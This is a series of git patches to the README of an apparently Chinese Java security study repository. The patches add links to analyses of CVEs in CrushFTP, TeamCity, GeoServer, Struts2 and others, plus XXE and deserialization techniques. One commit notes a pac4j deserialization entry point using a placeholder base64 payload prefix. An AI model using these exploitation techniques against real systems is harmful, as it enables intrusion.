[CrushFTP后利用提权分析(CVE-2024-4040)](https://y4tacker.github.io/2024/04/25/year/2024/4/CrushFTP%E5%90%8E%E5%88%A9%E7%94%A8%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90-CVE-2024-4040/) - Others - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) @@ -384,7 +389,6 @@ - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) - [Jenkins文件读取漏洞拾遗(CVE-2024-23897)](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html) From 59e20640ddb7601b10255aec5819e95093c6a9d2 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 20 May 2024 10:50:10 +0800 Subject: [PATCH 53/72] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 913949f..f2f7e2f 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,9 @@

2021年10月18日,梦的开始


+知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +![Bug Hunter](https://github.com/Y4tacker/JavaSec/assets/56486273/08eab771-b1cd-4d97-a3a9-173b78fdc997) + ## 1.基础篇 From 79a23affff66e5d7454d8acd2814e8a0201d942e Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 20 May 2024 10:50:28 +0800 Subject: [PATCH 54/72] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index f2f7e2f..ad2fd38 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,8 @@

2021年10月18日,梦的开始


-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) + ![Bug Hunter](https://github.com/Y4tacker/JavaSec/assets/56486273/08eab771-b1cd-4d97-a3a9-173b78fdc997) From bcbb4525172a2a33ee30772edd90d3b710d51978 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 20 May 2024 10:51:40 +0800 Subject: [PATCH 55/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ad2fd38..a430c9b 100644 --- a/README.md +++ b/README.md @@ -17,7 +17,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) -![Bug Hunter](https://github.com/Y4tacker/JavaSec/assets/56486273/08eab771-b1cd-4d97-a3a9-173b78fdc997) + ## 1.基础篇 From 4373be9973ab79f246dcaf25509a83c979707d59 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:48:40 +0800 Subject: [PATCH 56/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index a430c9b..9d1499c 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中 From afe3fc98188292748208d719e4b31e50435adfe6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:49:37 +0800 Subject: [PATCH 57/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 9d1499c..02116fe 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中 +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 From 8c852d3d3ec48f0c9ed1780e642ae06aaaea9efe Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:50:49 +0800 Subject: [PATCH 58/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 02116fe..d4a9c57 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@

2021年10月18日,梦的开始


-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 From f3b15d59e30df63d49e821ec43a6a08d4497a179 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:51:09 +0800 Subject: [PATCH 59/72] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index d4a9c57..9a6cb9d 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,8 @@

2021年10月18日,梦的开始


-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) + Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 From f098935f640e4a17e990251a36b24de246ce8009 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 28 May 2024 09:46:47 +0800 Subject: [PATCH 60/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新JetBrains TeamCity权限绕过(CVE-2024-23917)(这篇文章还讲解了一些容器与SpringBoot的流程知识) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 9a6cb9d..144eaba 100644 --- a/README.md +++ b/README.md @@ -394,6 +394,7 @@ Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分 - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) + - [JetBrains TeamCity权限绕过(CVE-2024-23917)(这篇文章还讲解了一些容器与SpringBoot的流程知识)](https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) From 84effdd5d719474892ef06843e5f4a55d0f162ed Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 5 Jun 2024 09:41:53 +0800 Subject: [PATCH 61/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新反序列化toString链 --- README.md | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index 144eaba..137c87d 100644 --- a/README.md +++ b/README.md @@ -14,14 +14,6 @@

2021年10月18日,梦的开始

-
-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) - -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 - - - - ## 1.基础篇 - [Java反射](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E5%8F%8D%E5%B0%84/%E5%8F%8D%E5%B0%84.md) @@ -483,6 +475,7 @@ Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分 - [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s/xxAtjFvk9RxWiY-pwGf8Ow) - [某Cloud系统漏洞分析](https://forum.butian.net/share/2529) - [任意文件下载漏洞的利用思考(总结非常细!)](https://mp.weixin.qq.com/s/3y62xuQJAj2gmtBSKvHHug) +- [jdk新入口挖掘(新的toString链)](https://xz.aliyun.com/t/14732) ## 比赛反思 @@ -534,6 +527,17 @@ Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分 - [回忆飘如雪](https://gv7.me/) +## 知识星球 + +
+知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) + +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 + + + + + ## 更多 From 831661aa8e4566e88e1ffb181b053c1762419eed Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 18 Jun 2024 22:50:10 +0800 Subject: [PATCH 62/72] Update README.md Update Smartbi --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 137c87d..9787a60 100644 --- a/README.md +++ b/README.md @@ -374,6 +374,8 @@ - [Analysis CVE-2023-29300: Adobe ColdFusion Pre-Auth RCE](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - Smartbi - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) + - [浅析Smartbi逻辑漏洞(2)](https://y4tacker.github.io/2023/08/23/year/2023/8/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E-2/) + - [浅析Smartbi逻辑漏洞(3)](https://y4tacker.github.io/2024/04/19/year/2024/4/%E6%B5%85%E6%9E%90SmartBi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E-3/) - CrushFTP - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [浅析CrushFTP之VFS逃逸](https://y4tacker.github.io/2024/04/23/year/2024/4/%E6%B5%85%E6%9E%90CrushFTP%E4%B9%8BVFS%E9%80%83%E9%80%B8/) From 4fbd70bc0d7913f89b1df5c8a017624c5abb0255 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 18 Jun 2024 22:55:40 +0800 Subject: [PATCH 63/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Update XML 相关漏洞风险研究 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 9787a60..930bf21 100644 --- a/README.md +++ b/README.md @@ -36,6 +36,7 @@ - [JSTL(看菜鸟教程即可)](https://www.runoob.com/jsp/jsp-jstl.html) - [JEP290基础概念](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/JEP290%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/index.md) - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) + - [XML 相关漏洞风险研究(关于XML结构方面的介绍可以看看这篇文章,浅显易懂)](https://evilpan.com/2024/06/02/xml-vulnerabilities/) - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) - [绕过WAF保护的XXE(一些通用的流量混淆方式)](https://xz.aliyun.com/t/4059?accounttraceid=04ba92e87b2342b9a14daca5812cc52aoxob&time__1311=n4mx0DnDBiitiQo4GNulxU2nD9iBDc70ZAnYD) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) From 85587e55ca31b840cd167921b5a7c82c076b79f1 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 23 Jul 2024 17:21:21 +0800 Subject: [PATCH 64/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 930bf21..8bd311b 100644 --- a/README.md +++ b/README.md @@ -387,6 +387,7 @@ - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) + - [浅析GeoServer property 表达式注入代码执行(CVE-2024-36401)](https://y4tacker.github.io/2024/07/03/year/2024/7/%E6%B5%85%E6%9E%90GeoServer-property-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C-CVE-2024-36401/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [JetBrains TeamCity权限绕过(CVE-2024-23917)(这篇文章还讲解了一些容器与SpringBoot的流程知识)](https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/) From a103573551ae31ca3534743c1c53251842571edf Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 26 Jul 2024 10:35:54 +0800 Subject: [PATCH 65/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新浅谈JFinal的DenyAccessJsp绕过 --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 8bd311b..fbf763b 100644 --- a/README.md +++ b/README.md @@ -429,9 +429,8 @@ - [Tomcat URL解析差异性导致的安全问题(网上看到的主要关注HttpServletRequest中几个解析URL的函数这个问题)](https://xz.aliyun.com/t/7544) - [Tomcat中url解析特性](https://github.com/Y4tacker/JavaSec/blob/main/8.%E5%85%B3%E4%BA%8ETomcat%E7%9A%84%E4%B8%80%E4%BA%9B%E5%88%86%E4%BA%AB/Tomcat%E4%B8%ADurl%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7/index.md) - [SpringBoot2.3.0以下路由%2e跨目录处理(可用于权限绕过)](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/SpringBoot2.3.0%E4%BB%A5%E4%B8%8B%E8%B7%AF%E7%94%B1%252e%E8%B7%A8%E7%9B%AE%E5%BD%95%E5%A4%84%E7%90%86(%E5%8F%AF%E7%94%A8%E4%BA%8E%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87)/index.md) - - [网上看到的Jetty的部分解析特性(支持%uxxx)](https://www.wangan.com/p/7fyg8k2c7781675a) - +- [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) ## 19.ASM与JVM学习 From 8995ac4bb87bcc9a89311d926d68e50628e78650 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 26 Jul 2024 10:36:40 +0800 Subject: [PATCH 66/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fbf763b..d2408e9 100644 --- a/README.md +++ b/README.md @@ -535,7 +535,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢(当然大0day不会发) From cf52fcfeea524938b9c6ec1568407342a7af58a6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 4 Sep 2024 10:30:46 +0800 Subject: [PATCH 67/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d2408e9..7623b4f 100644 --- a/README.md +++ b/README.md @@ -50,6 +50,7 @@ 如果想系统学习CC链、CB链的话这部分还是推荐p牛的[Java安全漫谈](https://github.com/phith0n/JavaThings),我只是简单写写便于自己复习而已(这部分看我下面的share并不适合新人,过了这么久看过网上很多文章还是觉得P牛写的更适合新人) +- [Java 反序列化取经路(强推)](https://su18.org/post/ysuserial/) - [Java反序列化之URLDNS](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BURLDNS/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BURLDNS.md) - [CommonsCollections1笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections1/CommonsCollections1.md) - [CommonsCollections2笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections2/CommonsCollections2.md) From 8140d9ea62bdb4efb6553bab75ff7a9527166dfe Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 11 Oct 2024 15:51:04 +0800 Subject: [PATCH 68/72] =?UTF-8?q?Update=20Java=E8=A7=A6=E5=8F=91=E4=BA=8C?= =?UTF-8?q?=E6=AC=A1=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E7=82=B9?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新二次反序列化利用点 --- ...2\217\345\210\227\345\214\226\347\232\204\347\202\271.md" | 5 +++++ 1 file changed, 5 insertions(+) diff --git "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" index 9767f82..97fb857 100644 --- "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" +++ "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" @@ -313,3 +313,8 @@ public class DemoTest { ``` 具体分析见https://y4tacker.github.io/2022/02/06/year/2022/2/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget%E7%9A%84%E5%AD%A6%E4%B9%A0/#hex%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E8%8A%82%E5%8A%A0%E8%BD%BD%E5%99%A8 + + +## org.pac4j.core.profile.InternalAttributeHandler#restore +使用{#sb64}rO0ABXN...serizalized_object_in_base64...,隐藏TemplatesImpl,可惜不是通用的 +参考链接:https://securitylab.github.com/advisories/GHSL-2022-085_pac4j/ From 99bb136c0f4e758126778538588819ed199e8b1b Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 11 Oct 2024 15:57:31 +0800 Subject: [PATCH 69/72] =?UTF-8?q?Update=20Java=E8=A7=A6=E5=8F=91=E4=BA=8C?= =?UTF-8?q?=E6=AC=A1=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E7=82=B9?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" index 97fb857..3ac9afe 100644 --- "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" +++ "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" @@ -317,4 +317,5 @@ public class DemoTest { ## org.pac4j.core.profile.InternalAttributeHandler#restore 使用{#sb64}rO0ABXN...serizalized_object_in_base64...,隐藏TemplatesImpl,可惜不是通用的 +另外很可惜的是高版本还做了删除,具体可以看公告:https://github.com/pac4j/pac4j/blob/1c198f3fbadc4e8c94bc953327e4e2a38c888525/documentation/blog/what_s_new_in_pac4j_v4_1.md?plain=1#L16 参考链接:https://securitylab.github.com/advisories/GHSL-2022-085_pac4j/ From b082f562c7655af991bf7cb78f87b743a5552ec6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 16 Dec 2024 23:10:40 +0800 Subject: [PATCH 70/72] Update README.md Update CVE-2024-53677(S2-067) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7623b4f..a71ee0c 100644 --- a/README.md +++ b/README.md @@ -225,7 +225,7 @@ - [S2-045学习(通过container获取全局共享的OgnlUtil实例来清除SecurityMemberAccess当中属性的限制)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-045%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-057学习(突破#context被删除限制,从attr作用域获取context对象)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-057%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-066学习(变量覆盖的有趣的例子)](https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/) - +- [S2-067学习](https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/) ## 8.关于Tomcat的一些小研究 From f8b923bacf07d188d99ae7d94943fdab3f1d9c47 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 5 Jan 2025 18:42:49 +0800 Subject: [PATCH 71/72] Update README.md --- README.md | 8 -------- 1 file changed, 8 deletions(-) diff --git a/README.md b/README.md index a71ee0c..87f4e22 100644 --- a/README.md +++ b/README.md @@ -531,14 +531,6 @@ - [回忆飘如雪](https://gv7.me/) -## 知识星球 - -
-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) - -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢(当然大0day不会发) - - From a6e0f8cc3a63622b768c3b46297c66dc8a0a85f0 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 10 Nov 2025 19:47:01 +0800 Subject: [PATCH 72/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Add No-FTP:高版本JDK如何通过XXE-OOB读取多行文件(WIndows) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 87f4e22..7b814d6 100644 --- a/README.md +++ b/README.md @@ -38,6 +38,7 @@ - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) - [XML 相关漏洞风险研究(关于XML结构方面的介绍可以看看这篇文章,浅显易懂)](https://evilpan.com/2024/06/02/xml-vulnerabilities/) - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) + - [No-FTP:高版本JDK如何通过XXE-OOB读取多行文件(Windows)](https://y4tacker.github.io/2025/11/10/year/2025/11/No-FTP-%E9%AB%98%E7%89%88%E6%9C%ACJDK%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87XXE-OOB%E8%AF%BB%E5%8F%96%E5%A4%9A%E8%A1%8C%E6%96%87%E4%BB%B6/) - [绕过WAF保护的XXE(一些通用的流量混淆方式)](https://xz.aliyun.com/t/4059?accounttraceid=04ba92e87b2342b9a14daca5812cc52aoxob&time__1311=n4mx0DnDBiitiQo4GNulxU2nD9iBDc70ZAnYD) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) - [低版本下Java文件系统00截断](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E4%BD%8E%E7%89%88%E6%9C%AC%E4%B8%8BJava%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F00%E6%88%AA%E6%96%AD/index.md)